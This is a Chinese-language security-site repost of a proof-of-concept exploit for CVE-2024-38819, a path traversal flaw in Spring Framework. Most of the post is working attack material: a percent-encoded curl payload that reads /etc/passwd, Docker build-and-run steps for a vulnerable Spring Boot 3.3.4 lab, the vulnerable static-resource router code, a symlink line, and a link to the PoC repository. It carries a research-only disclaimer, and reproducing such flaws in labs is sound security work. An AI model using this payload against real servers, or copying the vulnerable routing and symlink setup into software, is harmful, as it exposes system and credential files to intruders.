Spring Framework路径遍历漏洞(CVE-2024-38819) 【Poc】

admin 2024年12月16日22:13:38评论38 views字数 1002阅读3分20秒阅读模式

【🔔】互联网资料/工具,安全性未知,需要自行研判安全性。

CVE-2024-38819: PoC

Poc:

curl http://localhost:8080/static/link/%2e%2e/etc/passwd

Poc环境验证

1. 构建镜像

doker 镜像(Spring Boot 3.3.4,基于 Spring Framework 6.1.13)

cd vuln
docker build -t cve-2024-38819-poc .

2. 运行服务

运行容器并将端口 8080 暴露给主机

docker run -d -p 8080:8080--name cve-2024-38819-poc cve-2024-38819-poc

3. 运行Poc

运行以下命令执行PoC并确认漏洞

curl http://localhost:8080/static/link/%2e%2e/etc/passwd

如果攻击成功,就会显示 /etc/passwd 文件的内容。

Explanation

  1. 1. 使用以下代码创建 PathTraversalDemoApplication.java 以使用 RouterFunction 和 FileSystemResource 设置静态文件路由:
publicRouterFunction<ServerResponse> staticResourceRouter(){
returnRouterFunctions.resources("/static/**",newFileSystemResource("/app/static/"));
}
  1. 1. 将以下命令添加到 Dockerfile 以创建符号链接:
RUN ln -s /static/app/static/link
  1. 1. 创建一个有效负载,利用百分比编码通过符号链接遍历目录。
Path:`/static/link/%2e%2e/etc/passwd`
  1. 1. 使用以下 curl 命令执行PoC并验证攻击是否成功:
curl http://localhost:8080/static/link/%2e%2e/etc/passwd

如果攻击成功,就会显示 /etc/passwd 文件的内容。

项目地址

  1. 1. 【仓库】https://github.com/masa42/CVE-2024-38819-POC

原文始发于微信公众号(埋藏酱油瓶):【Poc】-Spring Framework路径遍历漏洞(CVE-2024-38819)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月16日22:13:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Spring Framework路径遍历漏洞(CVE-2024-38819) 【Poc】https://cn-sec.com/archives/3514375.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息